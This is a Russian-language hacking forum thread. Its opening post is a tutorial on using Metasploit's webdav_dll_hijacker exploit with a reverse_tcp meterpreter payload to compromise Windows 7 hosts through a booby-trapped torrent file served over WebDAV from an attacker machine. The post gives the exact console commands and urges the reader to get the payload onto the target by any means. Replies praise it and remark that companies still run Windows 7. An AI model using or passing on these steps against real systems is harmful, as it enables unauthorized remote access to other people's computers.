![]() |
Всем привет! В этой теме я хочу рассмотреть способ получения активной сессии meterpreter с помощью выполнения вредоносного кода содержащегося в файле, типа torrent.
https://forum.antichat.xyz/attachmen...c63e7677be.png С этой задачей нам поможет справиться Kali Linux 2016.2 Rolling и наличие обновленного Metasploit Framework. В качестве целевого хоста, я буду использовать десктоп с установленной Windows 7. https://forum.antichat.xyz/attachmen...578aadc24d.png Итак, запустив Metasploit, вводим следующее: > use exploit/windows/browser/webdav_dll_hijacker (Выбираем эксплоит) > msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp (Выбираем тип полезной нагрузки) > set lhost 192.168.0.104 (Определим адрес атакующего хоста) > set extensions torrent(Выберем тип расширения файла) > exploit(Запустим работу фреймворка) https://forum.antichat.xyz/attachmen...1dbfd46426.png Далее, запускается веб-сервер, на атакующем хосте, а по адресу 192.168.0.104\documents\ - будет находиться полезная нагрузка, наша задача состоит в том, чтобы используя всевозможные методы доставить ее на целевой хост. https://forum.antichat.xyz/attachmen...0dedc5c68a.png Откроем на целевом хосте строку “Выполнить” и впишем туда адрес, по которому находится полезная нагрузка: https://forum.antichat.xyz/attachmen...917f5cc550.png В консоли атакующего хоста видим сигнализационные сообщения: https://forum.antichat.xyz/attachmen...f4de70a83a.png Затем, в открывшемся окне на целевом хосте можно наблюдать сгенерированный Metasploit торрент-файл: https://forum.antichat.xyz/attachmen...f95a8eade3.png После его запуска, откроется активная сессия meterpreter: https://forum.antichat.xyz/attachmen...2324a9dfb6.png Проверим ее: https://forum.antichat.xyz/attachmen...ffbd738868.png В опциях эксплойта, можно изменить директорию и название полезной нагрузки: https://forum.antichat.xyz/attachmen...59ddb35f37.png При попытке применить эксплоит к Windows 8.1: https://forum.antichat.xyz/attachmen...bbe04a8b3b.png Так же реагирует и Windows 10, полагаю дело в обновлении, которое закрыло критические уязвимости в Windows. На этом пожалуй, все, спасибо за внимание. |
Цитата:
ТС Статья добрая, как всегда к месту. Плюсик и респект ) |
на предприятиях в основном 7-ки т.к. на старые принтеры и МФУ не всегда есть дрова на 10...
|
Цитата:
А вот если приучать мыслить более глобально, то автор предоставляет громадное поле деятельности и возможность пошевелить серым веществом, а заодно - возможность проявить инициативу. Дано направление куда копать, а реализацию можно сочинять самому. ================= Я здесь вообще-то недавно и, памятуя о том, что со своим уставом в чужой монастырь не ходят, особо не выпячиваюсь. Но полагаю, что все непонятки при собственной реализации принципа внедрения-атаки можно решить либо обращением в общедоступной ветке (то бишь здесь), либо в личке к автору, если придумали нечто реально стоящее. Нужно приучать людей ДУМАТЬ. Или я неправ? |
| Время: 14:20 |